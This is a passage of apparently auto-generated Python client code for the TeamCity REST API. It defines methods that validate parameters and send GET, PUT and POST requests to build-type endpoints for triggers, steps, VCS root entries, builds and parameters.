all_params = ['bt_locator', 'fields', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_steps" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `replace_steps`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/steps', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Steps', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __replace_trigger_with_http_info(self, bt_locator, trigger_locator, **kwargs): # noqa: E501
"""replace_trigger # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__replace_trigger_with_http_info(bt_locator, trigger_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str trigger_locator: (required)
:param str fields:
:param Trigger body:
:return: Trigger
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'trigger_locator', 'fields', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_trigger" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `replace_trigger`") # noqa: E501
# verify the required parameter 'trigger_locator' is set
if ('trigger_locator' not in params or
params['trigger_locator'] is None):
raise ValueError("Missing the required parameter `trigger_locator` when calling `replace_trigger`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'trigger_locator' in params:
if isinstance(params['trigger_locator'], TeamCityObject):
path_params['triggerLocator'] = params['trigger_locator'].locator_id
else:
path_params['triggerLocator'] = params['trigger_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/triggers/{triggerLocator}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Trigger', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __replace_triggers_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""replace_triggers # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__replace_triggers_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str fields:
:param Triggers body:
:return: Triggers
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'fields', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_triggers" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `replace_triggers`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/triggers', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Triggers', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __replace_vcs_root_entries_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""replace_vcs_root_entries # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__replace_vcs_root_entries_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param VcsRootEntries body:
:param str fields:
:return: VcsRootEntries
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'body', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_vcs_root_entries" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `replace_vcs_root_entries`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/vcs-root-entries', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VcsRootEntries', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __serve_branches_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""serve_branches # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__serve_branches_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str locator:
:param str fields:
:return: Branches
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method serve_branches" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `serve_branches`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'locator' in params:
query_params.append(('locator', params['locator'])) # noqa: E501
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/branches', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Branches', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __serve_build_field_with_http_info(self, bt_locator, build_locator, field, **kwargs): # noqa: E501
"""serve_build_field # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__serve_build_field_with_http_info(bt_locator, build_locator, field, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str build_locator: (required)
:param str field: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'build_locator', 'field'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method serve_build_field" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `serve_build_field`") # noqa: E501
# verify the required parameter 'build_locator' is set
if ('build_locator' not in params or
params['build_locator'] is None):
raise ValueError("Missing the required parameter `build_locator` when calling `serve_build_field`") # noqa: E501
# verify the required parameter 'field' is set
if ('field' not in params or
params['field'] is None):
raise ValueError("Missing the required parameter `field` when calling `serve_build_field`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'build_locator' in params:
if isinstance(params['build_locator'], TeamCityObject):
path_params['buildLocator'] = params['build_locator'].locator_id
else:
path_params['buildLocator'] = params['build_locator'] # noqa: E501
if 'field' in params:
if isinstance(params['field'], TeamCityObject):
path_params['field'] = params['field'].locator_id
else:
path_params['field'] = params['field'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/builds/{buildLocator}/{field}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __serve_build_type_builds_tags_with_http_info(self, bt_locator, field, **kwargs): # noqa: E501
"""serve_build_type_builds_tags # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__serve_build_type_builds_tags_with_http_info(bt_locator, field, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str field: (required)
:return: Tags
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'field'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method serve_build_type_builds_tags" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `serve_build_type_builds_tags`") # noqa: E501
# verify the required parameter 'field' is set
if ('field' not in params or
params['field'] is None):
raise ValueError("Missing the required parameter `field` when calling `serve_build_type_builds_tags`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'field' in params:
if isinstance(params['field'], TeamCityObject):
path_params['field'] = params['field'].locator_id
else:
path_params['field'] = params['field'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/buildTags', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Tags', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __serve_build_type_field_with_http_info(self, bt_locator, field, **kwargs): # noqa: E501
"""serve_build_type_field # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__serve_build_type_field_with_http_info(bt_locator, field, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str field: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'field'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method serve_build_type_field" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `serve_build_type_field`") # noqa: E501
# verify the required parameter 'field' is set
if ('field' not in params or
params['field'] is None):
raise ValueError("Missing the required parameter `field` when calling `serve_build_type_field`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'field' in params:
if isinstance(params['field'], TeamCityObject):
path_params['field'] = params['field'].locator_id
else:
path_params['field'] = params['field'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/{field}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __serve_build_type_xml_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""serve_build_type_xml # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__serve_build_type_xml_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str fields:
:return: BuildType
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method serve_build_type_xml" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `serve_build_type_xml`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BuildType', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __serve_build_with_project_with_http_info(self, bt_locator, build_locator, **kwargs): # noqa: E501
"""serve_build_with_project # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__serve_build_with_project_with_http_info(bt_locator, build_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str build_locator: (required)
:param str fields:
:return: Build
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'build_locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method serve_build_with_project" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `serve_build_with_project`") # noqa: E501
# verify the required parameter 'build_locator' is set
if ('build_locator' not in params or
params['build_locator'] is None):
raise ValueError("Missing the required parameter `build_locator` when calling `serve_build_with_project`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'build_locator' in params:
if isinstance(params['build_locator'], TeamCityObject):
path_params['buildLocator'] = params['build_locator'].locator_id
else:
path_params['buildLocator'] = params['build_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/builds/{buildLocator}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Build', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __serve_builds_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""serve_builds # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__serve_builds_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str status:
:param str triggered_by_user:
:param bool include_personal:
:param bool include_canceled:
:param bool only_pinned:
:param list[str] tag:
:param str agent_name:
:param str since_build:
:param str since_date:
:param int start:
:param int count:
:param str locator:
:param str fields:
:return: Builds
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'status', 'triggered_by_user', 'include_personal', 'include_canceled', 'only_pinned', 'tag', 'agent_name', 'since_build', 'since_date', 'start', 'count', 'locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method serve_builds" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `serve_builds`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'status' in params:
query_params.append(('status', params['status'])) # noqa: E501
if 'triggered_by_user' in params:
query_params.append(('triggeredByUser', params['triggered_by_user'])) # noqa: E501
if 'include_personal' in params:
query_params.append(('includePersonal', params['include_personal'])) # noqa: E501
if 'include_canceled' in params:
query_params.append(('includeCanceled', params['include_canceled'])) # noqa: E501
if 'only_pinned' in params:
query_params.append(('onlyPinned', params['only_pinned'])) # noqa: E501
if 'tag' in params:
query_params.append(('tag', params['tag'])) # noqa: E501
collection_formats['tag'] = 'multi' # noqa: E501
if 'agent_name' in params:
query_params.append(('agentName', params['agent_name'])) # noqa: E501
if 'since_build' in params:
query_params.append(('sinceBuild', params['since_build'])) # noqa: E501
if 'since_date' in params:
query_params.append(('sinceDate', params['since_date'])) # noqa: E501
if 'start' in params:
query_params.append(('start', params['start'])) # noqa: E501
if 'count' in params:
query_params.append(('count', params['count'])) # noqa: E501
if 'locator' in params:
query_params.append(('locator', params['locator'])) # noqa: E501
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/builds', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Builds', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __set_build_type_field_with_http_info(self, bt_locator, field, **kwargs): # noqa: E501
"""set_build_type_field # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__set_build_type_field_with_http_info(bt_locator, field, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str field: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'field', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_build_type_field" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `set_build_type_field`") # noqa: E501
# verify the required parameter 'field' is set
if ('field' not in params or
params['field'] is None):
raise ValueError("Missing the required parameter `field` when calling `set_build_type_field`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'field' in params:
if isinstance(params['field'], TeamCityObject):
path_params['field'] = params['field'].locator_id
else:
path_params['field'] = params['field'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/{field}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __set_parameter_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""set_parameter # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__set_parameter_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param ModelProperty body:
:param str fields:
:return: ModelProperty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'body', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_parameter" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `set_parameter`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/parameters', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ModelProperty', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __set_parameter_0_with_http_info(self, name, bt_locator, **kwargs): # noqa: E501
"""set_parameter_0 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__set_parameter_0_with_http_info(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: (required)
:param str bt_locator: (required)
:param ModelProperty body:
:param str fields:
:return: ModelProperty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'bt_locator', 'body', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_parameter_0" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `set_parameter_0`") # noqa: E501
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `set_parameter_0`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
if isinstance(params['name'], TeamCityObject):
path_params['name'] = params['name'].locator_id
else:
path_params['name'] = params['name'] # noqa: E501
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/parameters/{name}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ModelProperty', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __set_parameter_1_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""set_parameter_1 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__set_parameter_1_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param ModelProperty body:
:param str fields:
:return: ModelProperty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'body', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_parameter_1" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `set_parameter_1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/settings', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
